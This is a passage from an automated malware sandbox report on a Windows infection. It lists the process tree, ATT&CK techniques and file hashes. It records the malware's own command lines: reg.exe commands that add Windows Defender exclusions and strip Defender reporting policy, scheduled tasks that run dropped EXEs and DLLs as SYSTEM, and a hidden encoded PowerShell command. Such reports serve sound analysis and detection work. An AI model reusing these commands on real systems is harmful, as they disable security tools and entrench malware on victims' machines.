                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:1436
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:1832
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4708
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4824
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4728
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4108
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4760
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:4292
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hnkumIqTRwUxQLVB /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:1372
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    3⤵
                                                                                                                                                                                      PID:3212
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                      PID:1220
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1092
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\RHdUtmclRPrQNqWD /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4424
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /CREATE /TN "gFtcZmtke" /SC once /ST 05:59:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                        2⤵
                                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                                        PID:4888
                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                        schtasks /run /I /tn "gFtcZmtke"
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:4316
                                                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:1344
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "gFtcZmtke"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          PID:672
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /CREATE /TN "CHeJVxoJwhzmREGSo" /SC once /ST 16:23:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\NrvFFOH.exe\" sG /site_id 525403 /S" /V1 /F
                                                                                                                                                                                          2⤵
                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                          PID:4716
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /run /I /tn "CHeJVxoJwhzmREGSo"
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:5020
                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:4512
                                                                                                                                                                                          • C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\NrvFFOH.exe
                                                                                                                                                                                            C:\Windows\Temp\RHdUtmclRPrQNqWD\McgkcspSIzRLCAP\NrvFFOH.exe sG /site_id 525403 /S
                                                                                                                                                                                            1⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                            • Drops Chrome extension
                                                                                                                                                                                            • Drops desktop.ini file(s)
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                            PID:2472
                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                              schtasks /DELETE /F /TN "booXbIzkEgfNdKvxAC"
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:1380
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4148
                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                      PID:1392
                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                      REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:1636
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:3984
                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:2372
                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1940
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\QMuGxDzxU\BTHZZQ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "cPyDayBYNpjUpuO" /V1 /F
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:4900
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /CREATE /TN "cPyDayBYNpjUpuO2" /F /xml "C:\Program Files (x86)\QMuGxDzxU\SjLUPQI.xml" /RU "SYSTEM"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                                                                                            PID:1248
                                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                            schtasks /END /TN "cPyDayBYNpjUpuO"
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:2988
                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:4624
                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                schtasks /DELETE /F /TN "cPyDayBYNpjUpuO"
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:1532
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "CKLLrKbBjRttlf" /F /xml "C:\Program Files (x86)\YhmfbgEUeceU2\TxGCFfw.xml" /RU "SYSTEM"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                  PID:4708
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "QtMzpEnQzbovF2" /F /xml "C:\ProgramData\hnkumIqTRwUxQLVB\hDTQqdL.xml" /RU "SYSTEM"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                  PID:4780
                                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                  schtasks /CREATE /TN "jDcNWoQEywoxNtiMi2" /F /xml "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\dwCIwHl.xml" /RU "SYSTEM"
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                                                                                                  PID:3200
                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:4292
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "DwrQigzmMruJpsQaMBv2" /F /xml "C:\Program Files (x86)\iTBLcazoBHNRC\uXIIuhB.xml" /RU "SYSTEM"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:4124
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /CREATE /TN "oCvyuKWvFtUoYKNPA" /SC once /ST 12:23:54 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\RHdUtmclRPrQNqWD\dZVlWGGv\AffneSB.dll\",#1 /site_id 525403" /V1 /F
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                    • Creates scheduled task(s)
                                                                                                                                                                                                                    PID:4552
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                    schtasks /run /I /tn "oCvyuKWvFtUoYKNPA"
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:4508
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:1524
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:1368
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:4288
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:4792
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /DELETE /F /TN "CHeJVxoJwhzmREGSo"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:2812
                                                                                                                                                                                                                            • \??\c:\windows\system32\rundll32.EXE
                                                                                                                                                                                                                              c:\windows\system32\rundll32.EXE "C:\Windows\Temp\RHdUtmclRPrQNqWD\dZVlWGGv\AffneSB.dll",#1 /site_id 525403
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                PID:768
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\RHdUtmclRPrQNqWD\dZVlWGGv\AffneSB.dll",#1 /site_id 525403
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                  PID:4540
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                    schtasks /DELETE /F /TN "oCvyuKWvFtUoYKNPA"
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:2640
                                                                                                                                                                                                                                • C:\Windows\system32\taskmgr.exe
                                                                                                                                                                                                                                  "C:\Windows\system32\taskmgr.exe" /4
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                  • Drops file in Windows directory
                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                  PID:1620
                                                                                                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:3716
                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:4992
                                                                                                                                                                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                                                                                                                                                                      gpscript.exe /RefreshSystemParam
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:4456
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\rsijhjr
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\rsijhjr
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                        PID:2712
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\rsijhjr
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\rsijhjr
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:3836
                                                                                                                                                                                                                                        • C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
                                                                                                                                                                                                                                          "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:3872
                                                                                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:4332
                                                                                                                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1F20.bat" "
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:4000
                                                                                                                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1FCC.bat" "
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:2268
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:4116
                                                                                                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:2288
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:5116
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:976
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:2336
                                                                                                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:1624
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:4140
                                                                                                                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:4952
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:728
                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:4924
                                                                                                                                                                                                                                                                    • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                      C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:5040
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:3908
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                            PID:3324
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                              PID:3848
                                                                                                                                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:5060
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                  PID:4868
                                                                                                                                                                                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                    PID:3124
                                                                                                                                                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                      PID:3572
                                                                                                                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:1028
                                                                                                                                                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:1524
                                                                                                                                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:4780
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 4780 -s 4340
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                              PID:1052

                                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                                          MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                          Execution

                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                          Persistence

                                                                                                                                                                                                                                                                                          Modify Existing Service

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1031

                                                                                                                                                                                                                                                                                          Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1060

                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                          Privilege Escalation

                                                                                                                                                                                                                                                                                          Scheduled Task

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1053

                                                                                                                                                                                                                                                                                          Defense Evasion

                                                                                                                                                                                                                                                                                          Modify Registry

                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                          T1112

                                                                                                                                                                                                                                                                                          Disabling Security Tools

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1089

                                                                                                                                                                                                                                                                                          Install Root Certificate

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1130

                                                                                                                                                                                                                                                                                          Credential Access

                                                                                                                                                                                                                                                                                          Credentials in Files

                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                          T1081

                                                                                                                                                                                                                                                                                          Discovery

                                                                                                                                                                                                                                                                                          Query Registry

                                                                                                                                                                                                                                                                                          6
                                                                                                                                                                                                                                                                                          T1012

                                                                                                                                                                                                                                                                                          System Information Discovery

                                                                                                                                                                                                                                                                                          6
                                                                                                                                                                                                                                                                                          T1082

                                                                                                                                                                                                                                                                                          Peripheral Device Discovery

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1120

                                                                                                                                                                                                                                                                                          Process Discovery

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1057

                                                                                                                                                                                                                                                                                          Collection

                                                                                                                                                                                                                                                                                          Data from Local System

                                                                                                                                                                                                                                                                                          3
                                                                                                                                                                                                                                                                                          T1005

                                                                                                                                                                                                                                                                                          Command and Control

                                                                                                                                                                                                                                                                                          Web Service

                                                                                                                                                                                                                                                                                          1
                                                                                                                                                                                                                                                                                          T1102

                                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                                                                                                                            MD5

                                                                                                                                                                                                                                                                                            54e9306f95f32e50ccd58af19753d929

                                                                                                                                                                                                                                                                                            SHA1

                                                                                                                                                                                                                                                                                            eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

